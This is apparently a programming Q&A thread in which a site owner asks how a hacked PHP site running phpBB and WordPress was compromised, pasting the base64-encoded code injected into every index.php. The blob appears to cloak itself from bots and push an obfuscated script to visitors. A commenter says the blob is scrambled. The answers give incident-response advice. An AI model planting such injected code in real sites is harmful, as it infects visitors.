# PHP Web App was Hacked, how did they do it, how do I keep it from happening again?

Tags: php, security

I’m sure this has happened to many other people, but I’m not sure of the right search to find solutions,  my search results keep coming up empty.

A hacker got into my web app and inserted the eval code below into all index.php pages.  Our website is insignificant, so I am sure this was an automated attack.  I have both phpBB and wordpress installed on the site.  I can no longer get into phpMyAdmin

1. How were they able to do this?
2. How do I go about fixing it?
3. What do I do to prevent it from happening again?

   ```
   base64_decode('ZXydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaall5WmpjMFpqY3laamM0WmpVM1pqYzVaamMwWmpjMlpqWXdaalkzWmpZeVpqWXhaalJtTmpabU5qbG1OemRtTlRsbU56Tm1OelJtTnpCbU56Sm1Oak5tTlRkbU5UbG1Oek5tTkdZMU5XWTNOR1kxWmpJeFpqWXhaalk1WmpFNVpqaG1MVE5tTFRFd1pqYzNaall6WmpVNFpqYzBaall5WmpFNVppMHpaamRtTm1ZdE0yWXRNVEJtTmpKbU5UbG1Oak5tTmpGbU5qSm1OelJtTVRsbUxUTm1OMlkyWmkwelppMHhNR1kzTTJZM05HWTNPV1kyTm1ZMU9XWXhPV1l0TTJZM05tWTJNMlkzTTJZMk0yWTFObVkyTTJZMk5tWTJNMlkzTkdZM09XWXhObVkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l4TjJZM01HWTJPV1kzTTJZMk0yWTNOR1kyTTJZMk9XWTJPR1l4Tm1ZMU5XWTFObVkzTTJZMk9XWTJObVkzTldZM05HWTFPV1l4TjJZMk5tWTFPV1kyTUdZM05HWXhObVkyWmpFM1pqYzBaalk1Wmpjd1pqRTJaalptTVRkbUxUTm1NakJtTVRobU5XWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXlNR1l0T0dZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE0yWXRNamxtTFRNelppMHpNMlkyTUdZM05XWTJPR1kxTjJZM05HWTJNMlkyT1dZMk9HWXRNVEJtTmpObU5qQm1OekptTlRWbU5qZG1OVGxtTnpKbUxUSm1MVEZtT0RGbUxUSTVaaTB6TTJZdE16Tm1MVE16WmpjMlpqVTFaamN5WmkweE1HWTJNR1l0TVRCbU1UbG1MVEV3WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTlRkbU56Sm1OVGxtTlRWbU56Um1OVGxtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbUxUSm1MVE5tTmpObU5qQm1OekptTlRWbU5qZG1OVGxtTFRObUxURm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM00yWTNNbVkxTjJZdE0yWXlaaTB6WmpZeVpqYzBaamMwWmpjd1pqRTJaalZtTldZMk1tWTNOR1kzTW1ZM09HWTFOMlkzT1dZM05HWTNObVkyTUdZMk4yWTJNbVkyTVdZMFpqWTJaalk1WmpjM1pqVTVaamN6WmpjMFpqY3daamN5WmpZelpqVTNaalU1WmpjelpqUm1OVFZtTnpSbU5XWXlNV1kyTVdZMk9XWXhPV1k0WmkwelppMHhaakUzWmpZd1pqUm1Oek5tTnpSbU56bG1OalptTlRsbU5HWTNObVkyTTJZM00yWTJNMlkxTm1ZMk0yWTJObVkyTTJZM05HWTNPV1l4T1dZdE0yWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXRNMll4TjJZMk1HWTBaamN6WmpjMFpqYzVaalkyWmpVNVpqUm1OekJtTmpsbU56Tm1Oak5tTnpSbU5qTm1OamxtTmpobU1UbG1MVE5tTlRWbU5UWm1Oek5tTmpsbU5qWm1OelZtTnpSbU5UbG1MVE5tTVRkbU5qQm1OR1kzTTJZM05HWTNPV1kyTm1ZMU9XWTBaalkyWmpVNVpqWXdaamMwWmpFNVppMHpaalptTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpjMFpqWTVaamN3WmpFNVppMHpaalptTFRObU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTjJZMk0yWTFPR1kzTkdZMk1tWXRNMll5WmkwelpqZG1ObVl0TTJZdE1XWXhOMlkyTUdZMFpqY3paalU1WmpjMFpqSXpaamMwWmpjMFpqY3laall6WmpVMlpqYzFaamMwWmpVNVppMHlaaTB6WmpZeVpqVTVaall6WmpZeFpqWXlaamMwWmkwelpqSm1MVE5tTjJZMlppMHpaaTB4WmpFM1ppMHlPV1l0TXpObUxUTXpaaTB6TTJZMU9HWTJPV1kxTjJZM05XWTJOMlkxT1dZMk9HWTNOR1kwWmpZeFpqVTVaamMwWmpJM1pqWTJaalU1WmpZM1pqVTVaalk0WmpjMFpqY3paakkwWmpjNVpqUXlaalUxWmpZeFpqTTJaalUxWmpZM1pqVTVaaTB5WmkwelpqVTJaalk1WmpVNFpqYzVaaTB6WmkweFpqUTVaalptTlRGbU5HWTFOV1kzTUdZM01HWTFPV1kyT0dZMU9HWXlOV1kyTW1ZMk0yWTJObVkxT0dZdE1tWTJNR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TXlkZFd6QmRMbk53YkdsMEtDZG1KeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTVNU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUt5Z29aU2svZWpveE1pbGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUppWjZKaVpvSmlaekppWm1KaVoyS1dVb2N5azdQQzl6WTNKcGNIUSsnKSk7DQp9DQo=');?>
   ```

Comment: Hacked how?  Like they changed the user for your myPHPAdmin?

Comment: have a look at the websites of the projects and compare your versions with the versions you can download there. than have a look at the changelog of the projects and if there are any security-fixes mentioned. you should always keep your software up-to-date ... that should help avoiding hacked webservers ...

Comment: This might be a little more appropriate for the [Security](http://security.stackexchange.com/) site since it isn't really programming related.

Comment: well you can just do a find in files with notepad and insert a '#' before all the evals if you need something immediately but that won't solve the underlying issue....

Comment: Please don't post insecure code wrapped in `eval()`. If you want to publish the code fine.. but don't make it easy for someone to mistakenly execute it as well.

Comment: Mike B, the base64 data has already been scrambled, so it's completely safe anyway, it doesn't decode to anything.

Answer (score 2):

First look at your Apache logs, which scripts were they hitting? Next look at your site for any custom scripts and scrutinize them. Also, look for any back door apps they may have hidden. In some cases, you can look around for recently modified files or recently created files... if they were smart you would need to check all files.

"They", probably a script, did this by uploading a script to your site and then causing your webserver to run that script. Then the webserver messed everything else up.

Your question is general so I'm giving broad advice here, when you have details you may want to open a more specific question.

Answer (score 2):

I am sorry that this happened to you. Short of more information, here's what I would say you should look into:

1. Web server security. You're assuming that they hacked into your web app, but they could have gained access to your hosting account in some way. If you transfer over plain-jane, unsecure FTP, this could very well be the source of vulnerability. Also, many shared hosts (I'm assuming you're on a shared host if you're using PHP and aren't sure how you might have been hacked) have pitiful security when it comes to keeping user accounts inaccessible to others.
2. If the junk is on dynamic pages, then they did compromise your app or your database (if you can't get into phpMyAdmin, then this is definitely a possibility). Contact your hosting provider and they will hopefully be able to get you a new password.

Comment: Yes, I am on a shared host, and it was inserted into dynamic pages.  I am new to php and was hoping this was some simple thing that had a simple solution I just wasn't experienced enough to recognize.  I will call the company that built our site (they didn't bother to tell us who is hosting it arg)

Answer (score 1):

At first, roll back the changes made by the hackers (backup, server roll-back ...). After that, update every CMS, Module, Theme or any other PHP-Application - and keep them up-to-date in the future. If it has really been an automated attack, the attackers used a public exception, which is most likely fixed in newer versions of your software.

Edit: But - of course - remove every injected line of code like Full Decent described in his answer.